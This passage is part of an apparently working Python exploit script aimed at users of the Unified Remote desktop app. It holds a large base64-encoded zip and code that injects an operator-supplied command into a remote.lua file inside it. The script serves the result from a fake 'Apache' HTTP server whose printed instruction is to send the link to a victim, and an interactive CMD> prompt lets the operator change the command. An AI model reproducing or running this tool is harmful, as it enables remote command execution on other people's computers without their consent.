"XqmaWifenmyGGbkNxf9hN/FXmJIqa6D1VXr++Fwec3JGrK5r3RegPewVrsyG6Dk7uOFk90mOpf9q7JoXQ+JaO1"<br /> payloadzip += "rLrtzgoJdYeiAzCBRsmv2O3KogHcQwV4IdluaS/bnDJhmWTxokNDCk1cdyn0tQJ7wtJyK7yUEAWls+MyjJdeLT"<br /> payloadzip += "xCY4U4y9YJNAI02pWYAfGTSAxHb43oSHVTUlCJQp3pAH3J1RcTlrWLyOB5XY3qf0rFOc4cOZEvDqs+2TZq/MTH"<br /> payloadzip += "0x/QZ7khS0NszZGuM92NjhLe+Ts/99688l3QhiVo8KptRhbO2ErlbDUfctViD6kqhJep+7wjzFNeEkSr6//rOd"<br /> payloadzip += "Kb0haHK4u6akJk73WQbPTWxArx9wFaTN7HS/TzbxpefRWkSA38kQYNwEX8G6DFGEjY86gegWO3W/djOdkAKno0"<br /> payloadzip += "oAVIS9bEPUPXOki6zrEyWA5+P3dyI2rEH3ZvfuUzEzR1ji59glQhsT0ZWtf/7NztZ6gBpQZzqPr3BN9u9Zw2Ke"<br /> payloadzip += "XaBXC58trB9taZrmPOuTrLvA3/fNWflD3tWLafYRea+uN92+zW0uYnAi06U8G3eSlqFqWol16to5RTFIsrOiaK"<br /> payloadzip += "UNU2ria3k87YgbLyGqbNlIHX0aZT1piGhuvv/Q3yUYrUmZrA+HRcjrgvvusq5hqcMtPnubaUl+iLWUTDVIN9Cw"<br /> payloadzip += "E0+o5pMX8Ep/wWbHWQjH+9ijC9rqN3PIo4/Pr8ySIkuzdpQlKtT8fCJT2ABTZTZTlzsbO21JuN5S9KIxtZShqr"<br /> payloadzip += "yuYvNdSCzQSS3T9K5gidP9k0ubRqFjoVhguZ8WQuVxmp7nfVovkjNxxkez2aJGoZLNf1VEBtLrldbPX/OuvSh9"<br /> payloadzip += "TZu/JMRPnqwQvM5/lzMLxQEpqm3+5TgyAgHFMcrq6bdOYlx2G2dPWu5fpDHRaOpskQnoY54iDRC/6PbtjPnZDw"<br /> payloadzip += "m2xcTvsFu+9aBw/XbWIsLLKT5QsuTsnYCYOFqbGOCtvDljYg4BC05UfUqa5bVb59y5+2IMrKqmwtzK6cZTni8r"<br /> payloadzip += "6IGPRvBHp3YPbUsiwdJCvcRKkAdQUPN/17VHT7dQn4Yo1xYiIo1H7D6KS+7RIMko3hedMaV/Nrc8W7v7a8BT29"<br /> payloadzip += "VYwH2T09Cx8bRoTIO0ieWgAY3Bzbzz3iKbr9susttl+RAobCZ9cLnT8w6IYHDVkNVjFhunSh1Wh7lXpf7dRMn6"<br /> payloadzip += "dkT5Hy3ljcbEZaUfq9JFv+u7iO5eWuCG2kK9qXVLlP9+/pp7b09rBErT85EVkKI7ezw3o5Nhms9b6BY3LmwOjZ"<br /> payloadzip += "bzd71fRxUFfYnDk77AGmDPQexJxS+4huNp2LGXCT+BHx1WCwT3+KC9/kj3ddMKnhJbo9XwPBjX5zkb3imac2uf"<br /> payloadzip += "KSSCZmOQJX/rGTvnJEizZofiVjOYKDmAzlWJzJAH3QHPXGc8cfXQDXuonZiIb0QTOQdqRUP4MMlp+NhTDiNgD1"<br /> payloadzip += "WQerOVTOqEYsOcM7EGapawBQv2XifXnFaUv6d8FAaMmTJikE2P4TVR1apcKROIOzQ74uF43aD8oiQJNdp9AZZy"<br /> payloadzip += "BPowGUnF59a9GbZ0AAdJFzlNfvE1pYM8xOkWraj/WTjDAL0xa/fAWsva5jp8//lKMjhS0Zz+E6yNL0KYtxfguG"<br /> payloadzip += "W8Xp+vTe/+9icfDmu7siQ14r1KV8UsLBCmtq+1sdHduF9+0jLCpOikc8E9a9nvVZDjs5L89n9iSmTMqCdmde2u"<br /> payloadzip += "z5K532nlk1NDeU8j7POzgm9XVWCe4Sk3phRXTpXeHU4bklL+P/5GfHb3GUZQDce0spFeWWmFn49Xpgqm1cVSMo"<br /> payloadzip += "H6Trd2ybuNtdmJIwIn371ugKGFSWYx/dkiumnBuOiOZJIbveYs/aJJ4xHelcjmzUqmqUGNtuGPSJ0cfi/ATLB5"<br /> payloadzip += "yJ4uCM0sdzXtFyzhG7hPQ86Y47GWp1fizuk0OIszlCAjDVz5D4mr2fe47Gs1kKnzijEY0cT3Nkh895Pbh+XcYq"<br /> payloadzip += "5aWDJK6j4M90ZrnzzCGOoc/EhI5UjANAqrVthqQOKeBJgmeWmyO+JARSnZUyJFY/XdQNN7fmK0AVEeJwuNxerD"<br /> payloadzip += "q9dl5zMuKVAiSoqssDT3Uhm4xptP0UxVS8ORbH/JRAlsaSeECDgFIhWhGL6wyNBdThXbOA/n4/bCsgdIYCd7/r"<br /> payloadzip += "CZG6QpFUtvRl7ArTfgNkZd1zlBCHdKXajoZc15aiPmgIuwrMpVo5YooAAzPPsMVdC9012KYEq/KlCfdsZ3V703"<br /> payloadzip += "NCRFemDdvJsoOSeeAtA3Z22HyRAz8W15s4s0loSURvvkI8GpwHOKXxxc/gnEcPdtf1sjEvBCh5myPjDf37PkCn"<br /> payloadzip += "pla+uFUQZOmqhZLbjFaDsLYZND4kTnTs9OzCDMDSz61b5gOcWvTUnSwFX+wtDkn1qvYSsLZtnDhehdx+c/KxwO"<br /> payloadzip += "/UD0/LxVc+O3JECa7YC3FMpH/6mEh90oBz7k9Yd38050v/lNIhnjCTNYA3H1j6GaFpHPYQYLlgHdX01XjAWETU"<br /> payloadzip += "CUzzTdHD8y70xaeU1vd7ar5ptPxIduCYIaLTWNc+YwDpBziJeFjSR2eNZ2APo3Pbm56xBRrya/sLU3Sk6gqIx4"<br /> payloadzip += "Rvq8GskrTZO1ZQM2WBVSOJJJfhzsmSqUVvqrjrTbKOBfdd+P5tixb04oCikBJnoGmRSIpwbQs3HV5vZ/Ze1hyp"<br /> payloadzip += "ixndjXSGuBH2yA31Zea3PR5OmmDFPIP1f1Ju47jNyojzx3+KMbuwWNQ8LMA6a0hQelKKwfi1AmNnZZU0GhZHAl"<br /> payloadzip += "FDEwbfWNx7Y/sOy8HZwx7VmpQbb3v1SoEhTTbsMQNYqmn0KEfcMZ3K/1HCMduyKnFN/WSThxaqEuU5D/KjFMfn"<br /> payloadzip += "4uvkEjJTnlr1y48YJJ+jwNj7vQmBpIcBgfuclGS1eBhudm/QRQo0YDymUSLvMtCqjiUB0x/xOO7hrVIXhEdFny"<br /> payloadzip += "r3w/MtaS8zP35ZC2NPJ+ieXpgKBjvNRJcBDFMmONwmHy3Uf7BGFdoWwrkkrO7RYE2/OBOy0eJcm7ZUzJWpAEC9"<br /> payloadzip += "PO5+CvItOtSOTRwhcm9yYzgYfJwfZnZgYBjZXT2lk6XA3XajtVlSt46lewlN7HoybL9wiP+TJeG9M1lwo/DEn8"<br /> payloadzip += "qthxs7Jl8V7ZVrv47VcEnt1JF3y+vbN1zQVNsa77KlXx97Hyf8pv3r+Qjj1svZxv/zPk7huRqXnPlU+BwwWC+u"<br /> payloadzip += "ksKAjEfd1YoTWb8KOraFdDW6VKf87UaC3Ys7MPlXpluhCCCma5AVC52NXIh5vHAgnwzws+edoMTvs3oWBeDW62"<br /> payloadzip += "AMSCz7PKyNA4ivFWO+nkSAYeCR1ool67pyMvdfbdZ7I4BdZXsGJNmB4I9l5nmt2eK39niuY6UCJOn/KTXEyvf3"<br /> payloadzip += "VTUT55LBF9vu1PTGTS+BmvEo7VBTC0LKi9KBp/SZBH3YjJ3Y/XdTaMnds+KsagSh/bPBRZy/i0hTXuwGVz62TZ"<br /> payloadzip += "z9Dp1+jNmCf3bIXE6Dd57Dgm22UBAsavOZznF7iNBUnqQZ6WPbHtrQCNSo8NgeJRmIxZRaKtfwqxDPCPg35ghA"<br /> payloadzip += "73enFIlOK0LSxgNjatHLqkhpqMbsKQkfGDVBuOsB/H26JiXr1dC5sedzgzd7IEseoN0+jay7BGaXBVWw4iclr9"<br /> payloadzip += "XQTkUeAjk+fcF/tFXnOEQ11AI7aTKLCjD0zeHnoKRoK1xIx54kw5MNo9Evvo5GPyz1Hcj89eX+FAFU/l7rKYlu"<br /> payloadzip += "GKVkNI5LnThrCexTuTrFTYrgNA+gNj3je+MCeCgDEKWqEzzEWqgGzgBeNhkPhgfk4bCza9MM1ja26nhKHPdJgy"<br /> payloadzip += "f23Lnl9YuJtsfFUy/PRAM7MFc3u0kF0mpllvMWwtfkxlrW3gDAaeBxjHfZEuazq6zx8XBH9ThLPG8xaD/Luy1p"<br /> payloadzip += "6Z29f7PcVXhubtnKC5B13cos/5YsrJUhoM8a/Fo78jBzzHEI81TU46xWO0hda18nBWiFh+THCjxDtU8K1jfwPQ"<br /> payloadzip += "Q78Yz4QzvDwy5gSflJWmiy6iw4mD4Zg4mOR3+YLpEnwIZvWp4Sy7xRk3SdkO0vSYDezm382+XoQDgm2GkXpTbT"<br /> payloadzip += "eoTIUAKsLb+95kTpvbVYKOgzJ4vnwHjza9XdPBcrjFv0SBRUj8xqQOrv/kdJNw3jtteKi/tn7eCWmjuXjPxjq3"<br /> payloadzip += "seq9Gm/k0J4BmCoeJHoSTUVre0pUs/9EMwhREd0DKPpw0FB2hgmCAKcsDbbl0KwVjJ9+RjcecjaXS1yHt6CdQt"<br /> payloadzip += "dzwiau0LAOwotmeg2/PgR0R0vVRUOMC57rtpwzJw97j1ahzqFJV+TilcE8eIv2wyGmRPgy3F+xuKNV+827ieTM"<br /> payloadzip += "TRDjxaKlh4gsi8hpmz5drLUlMs0otIjMtJBYO6k2TuipXfqCQGOan9xyJnSN20q0Cbii5xunb0R0fOXTuzmssM"<br /> payloadzip += "WKDUXslJ3QoHPs4MQszYIP237toWsDpxr+D3Hzzj4st3BaO6d8nc77BoRkMDYayu1NrDfEIGCxKBZtzj1s6P20"<br /> payloadzip += "+kXUKHxo629sigBG9bz5YdJ/++icxTxT2aB4yawMhLm7I05kOazbV0HFw59/o+VtDlktFnAK55zg3P3V+s2sSN"<br /> payloadzip += "xTh7bzn3P8XNzT98mPxVYJmLZ2oBem9Fk8ByE+z5bINVOqhPVOSl4s+7pdG0hrEXn5aCs8XOA96ilO+IZlrYor"<br /> payloadzip += "Y1gK512v2Lm/DkxVMxueCEHui0akVKbj9nLUxf/Gb+JB7qYr1f7jQ3goP5jm+6N8gw5NZWhD7osM/4OXZj9g55"<br /> payloadzip += "TOd0Zcswtuf9251Qa78xfXHJuq69i2fO4+pQvYFP/ZPja7aEbEjRbZN9gHT82SLF3nm4XTJTmCM+PQh7JvFOY/"<br /> payloadzip += "bYVJzfGvG3AEg2QPT/TdmbYA+xdxqKWHlqaF+OzWBmE3CTXg+vzvwpiLKeQb7rqB83KocarRczdPuP4qrC0LDC"<br /> payloadzip += "QFg1g7QZKKOmDz8V8j3VII1K9anvjaHB71MrGxyFH92eUXhPt1+Ee/WB9sLgU/nfGh6/STysxU1mwI0v6c9+3C"<br /> payloadzip += "09/2STFM73+qC+aGITHFzGtMMwdW/S/UaEaIlnrmWH9/TvG7K20uDL+ROyRlwiB9ak5tUJL6ff4Kn9xtZK5zyf"<br /> payloadzip += "ZfIKflxEzum2uoUGwI2eAiYq7hfV/rARCGsTSn3XOM2nbpJ6OXMSYdtW0Nu+B9lCbxDJ9yyNwRq0qeBMqXUqJk"<br /> payloadzip += "gtA8YoL8F6e2elMRiOvujWhSWLcHnhgHo/yvx4MdFVpnP23y8nYi31rxMYNhWsar1eePhVhqS+IJ8q/b58ZYUL"<br /> payloadzip += "kfndAg27CJ8bB8JCCTC7oRlQcaDA+o9Q+o9A/g/BIP3Pd27yEvwvEX01GNF+LqAeWr8AMjZn8gfgXaMMyRmC5h"<br /> payloadzip += "O88vgnF0vPilkJ50OSDFI+1ucxbbdBBcxbddQ7dCMlNxKpsJ+EDPz6UmwCaLf6mgegahVil6CtbpQDkTJ0uvoB"<br /> payloadzip += "YQDsHyK8sH6EBjxB9GxHKRskztuXwdOlhIeKoKfaxM9/t4Ahl0b5o7gc8X2x5hqHzHj5CK2T8o2ncUUm6ZJb1U"<br /> payloadzip += "IC2rYdXUOAYV1xoEAOSmSQTURc8yBWX2wmvHFqXkIav10bimPwwrgVq0kwbmrH43goY87gjr5l0C/ZSLKPjKov"<br /> payloadzip += "lkVQXRMue/b3E9jy+rsu+JpQSdWIUhQh5ubxI10cd2yFBRl5UCEuBXMc498yb3pbZVCrFQlqluLK9jM2b3x/C2"<br /> payloadzip += "KS6sYoAyI3zAA9FomkhirJYrIOOUIpOCaLU7XW594C6gYdFoJKz521/Qmyw+vgYL5waEwJvDRJb+wGdeXgXdlb"<br /> payloadzip += "IxzohIMq4YLypajQnvb3ZsBupzLDaHUrVUUEMCDjytNU9fRUGHKVDS9Y7pqf846RPtuIzPjuu37sxHuda1QP/a"<br /> payloadzip += "4pNoBeafAQ9QJbFdx7r9lzyHA0AO+kBdrlZEyFd2HcyF9fPsmlkHDZMsRpp1POHGAsXca0Guxw9i33giqSGf+Q"<br /> payloadzip += "H14dQYUXuTsVCdI78fcWyJbuDcVBfASapUAlU/we6lFbRJl3wiWmmMl1CTQ9TW05RsLRKTkY30aST6d1HkN6Ix"<br /> payloadzip += "6ljUTLY3dpGcnbxpjbgItJaU8bOTn7wyX5MvpBDHHzTA6FS+66Sn4bFl/GI+iPi1x2c8eKgqMbaUcdG164dJkB"<br /> payloadzip += "g4o+VhCv2cRfBlneVGUbY6bXRtqxJ8cqefxDBCAgvbu7OK6edBxcBE0hDWgktIyCg1rChYRFm+RMvuRdEz0Jzh"<br /> payloadzip += "hdDlRrqrLCSxU0WZbjLCLBivkEE5Ivm6r9ETHCKFWCyWhHahEOvxy3QSZbuOaXmyN2Ni1CL2tfAOHyTjxZcfjj"<br /> payloadzip += "lIP9eP48KRxskb5g3DCfdIE7BiFKHnzHCnFl6asuBrApxszX26hFOB/TPR2XnIWHQ1weYD48FHFhYjWpVzZmxp"<br /> payloadzip += "tV7LtYHQdLvimSPGXlo0jxyoozx2ccL+MQDGH4MFfJ/jKqtPTOS++uR+o6CN3KLwBEhl+Y6I68La0zn3q6PmHw"<br /> payloadzip += "Z1O3GaD3yxl2f51JznJBN+9pnOjwm16KAxJeU0ADhvlh5mbF2T3uR8kNhRDgipH8JUP8MuqlEPxHZea+xDqOjd"<br /> payloadzip += "HOaxjKnipJr4pb9FhHW9F3TJt10MhHidxrjGWbYvxtBoNzwlaqQ1sdgXOLSJcPXGB67Xitf381f/msRnuIFyee"<br /> payloadzip += "M5gfaM4/XFlqHfLqBLi3lSqfjHtbtNZ4PHtm99uOUzh1LDUEadpllnHj+886p7Cti60TKdFT6a4nA7Hw+DdqKR"<br /> payloadzip += "9Uu2iWElo7li3Quy358rPJYxLT/p+3zM8rNzuKYn19WTcpPpafhp0vE3HwU4XceE2XvPo+4eIGa6t74pI7QwdN"<br /> payloadzip += "Dbd9T1jLD+wKA6hpNNUky0hHL6IsDXEKOnNPYfToD1eODqs5oT45giDkAB56qg2il7Q8zgXsb7epxY6XJsyL/w"<br /> payloadzip += "9QSwMEFAAAAAgAyW5GVpHSloBqAAAAfgAAAAoAHABsYXlvdXQueG1sVVQJAAPaTOFj2kzhY3V4CwABBOkDAAAE"<br /> payloadzip += "6QMAALOxr8jNUShLLSrOzM+zVTLUM1BSSM1Lzk/JzEu3VSotSdO1ULK34+WyyUmszC8tAbI4bYryy0E0p01SaU"<br /> payloadzip += "lJfp5CSWpFia2Sc35ubmJeioKhkkJ+Xkliga1SMkQEKKAP1qcP0Qg0TB9qGgBQSwMEFAAAAAgA625GVnXmTfxA"<br /> payloadzip += "AAAAUQAAAAkAHABtZXRhLnByb3BVVAkAAxpN4WMaTeFjdXgLAAEE6QMAAATpAwAAy00tSdTLS8xNtVIIyHdWCE"<br /> payloadzip += "ktLuHlygUJJpaWZOQXWSlkmBRlG+dVGUCFU1KLk4syC0oy8/PAWqDCJYnpxWA+AFBLAwQKAAAAAADObkZWAAAA"<br /> payloadzip += "AAAAAAAAAAAADQAcAHNldHRpbmdzLnByb3BVVAkAA+RM4WPkTOFjdXgLAAEE6QMAAATpAwAAUEsBAh4DCgAAAA"<br /> payloadzip += "AAJJVIVuDb9rkdAAAAHQAAAAoAGAAAAAAAAQAAAKSBAAAAAHJlbW90ZS5sdWFVVAUAAxMz5GN1eAsAAQTpAwAA"<br /> payloadzip += "BOkDAABQSwECHgMKAAAAAADcgJVQoVLDXdMEAADTBAAACAAYAAAAAAAAAAAApIFhAAAAaWNvbi5wbmdVVAUAA2"<br /> payloadzip += "BSn151eAsAAQTpAwAABOkDAABQSwECHgMUAAAACADcgJVQaHPvRU4gAAAZIgAADgAYAAAAAAAAAAAApIF2BQAA"<br /> payloadzip += "aWNvbl9oaXJlcy5wbmdVVAUAA2BSn151eAsAAQTpAwAABOkDAABQSwECHgMUAAAACADJbkZWkdKWgGoAAAB+AA"<br /> payloadzip += "AACgAYAAAAAAABAAAApIEMJgAAbGF5b3V0LnhtbFVUBQAD2kzhY3V4CwABBOkDAAAE6QMAAFBLAQIeAxQAAAAI"<br /> payloadzip += "AOtuRlZ15k38QAAAAFEAAAAJABgAAAAAAAEAAACkgbomAABtZXRhLnByb3BVVAUAAxpN4WN1eAsAAQTpAwAABO"<br /> payloadzip += "kDAABQSwECHgMKAAAAAADObkZWAAAAAAAAAAAAAAAADQAYAAAAAAAAAAAApIE9JwAAc2V0dGluZ3MucHJvcFVU"<br /> payloadzip += "BQAD5EzhY3V4CwABBOkDAAAE6QMAAFBLBQYAAAAABgAGAOQBAACEJwAAAAA="<br /><br /> with open('src.zip', mode='wb') as zo:<br /> zo.write(base64.b64decode(payloadzip))<br /> zo.close()<br /> with zipfile.ZipFile('src.zip') as inzip, zipfile.ZipFile('dst.zip', "w") as outzip:<br /> for inzipinfo in inzip.infolist():<br /> with inzip.open(inzipinfo) as infile:<br /> if inzipinfo.filename == "remote.lua":<br /> global command<br /> content = infile.read()<br /> content = content.replace(b"rplcemelykmyx", bytes(command,"utf-8"))<br /> outzip.writestr(inzipinfo.filename, content)<br /> else:<br /> content = infile.read()<br /> outzip.writestr(inzipinfo.filename, content)<br /> inzip.close()<br /> outzip.close()<br /> if os.name == 'nt':<br /> os.system('del src.zip')<br /> else:<br /> os.system('rm src.zip')<br /> zi = open('dst.zip', 'rb')<br /> b64data = base64.b64encode(zi.read()).decode('utf-8')<br /> zi.close()<br /> if os.name == 'nt':<br /> os.system('del src.zip')<br /> else:<br /> os.system('rm dst.zip')<br /> return b64data<br /><br /><br />def user_update():<br /> time.sleep(1.5)<br /> while True:<br /> new_cmd = input("CMD> ")<br /> if new_cmd.lower() not in ["exit","quit"]:<br /> global command<br /> command = new_cmd<br /> else:<br /> os._exit(0)<br /><br />def http_handler():<br /> BaseHandle = BaseHTTPRequestHandler<br /> BaseHandle.server_version = "Apache/2.4.10 (Debian)"<br /> BaseHandle.sys_version = "Unix (Posix)/6.1"<br /> class Handler(BaseHandle):<br /> def log_message(self, format, *args):<br /> pass<br /> def _set_headers(self):<br /> self.send_header('Content-Type', 'text/html')<br /> def do_GET(self):<br /> if self.path.split('/')[1] == "index.html?base_fields=1":<br /> self.send_response(200)<br /> self._set_headers()<br /> self.wfile.write(bytes(generate_payload(),"utf-8"))<br /> else:<br /> self.send_response(404)<br /> self._set_headers()<br /> self.end_headers()<br /> self.wfile.write(base64.b64decode(html_404))<br /><br /> http_serve = HTTPServer(('0.0.0.0', int(args['port'])), Handler)<br /> print('[+] SERVING DYNAMIC PAYLOAD PAGE ...')<br /> print("[!] Send To Victim Running Unified Remote Desktop App: http://%s:%s/index.html?base_fields=1" % (args['ip'],str(args['port'])))<br /> http_serve.serve_forever()<br /><br /><br />Thread1 = threading.Thread(target=http_handler)<br />Thread2 = threading.Thread(target=user_update)<br />Thread1.start()<br />Thread2.start()<br /> <br /></code></pre>
